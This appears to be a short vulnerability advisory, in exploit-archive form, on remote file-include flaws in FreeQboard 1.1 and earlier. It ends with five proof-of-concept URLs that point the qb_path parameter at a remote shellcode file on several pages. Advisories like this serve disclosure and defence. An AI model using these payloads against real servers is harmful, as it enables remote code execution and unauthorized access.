13 lines
No EOL
777 B
Text
13 lines
No EOL
777 B
Text
source: https://www.securityfocus.com/bid/21394/info
|
|
|
|
FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
|
|
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
|
|
|
|
FreeQboard 1.1 and prior versions are vulnerable to these issues.
|
|
|
|
http://www.example.com/[path]/index.php?qb_path=shellcode.txt?
|
|
http://www.example.com/[path]/faq.php?qb_path=shellcode.txt?
|
|
http://www.example.com/[path]/delete.php?qb_path=shellcode.txt?
|
|
http://www.example.com/[path]/contact.php?qb_path=shellcode.txt?
|
|
http://www.example.com/[path]/about.php?qb_path=shellcode.txt? |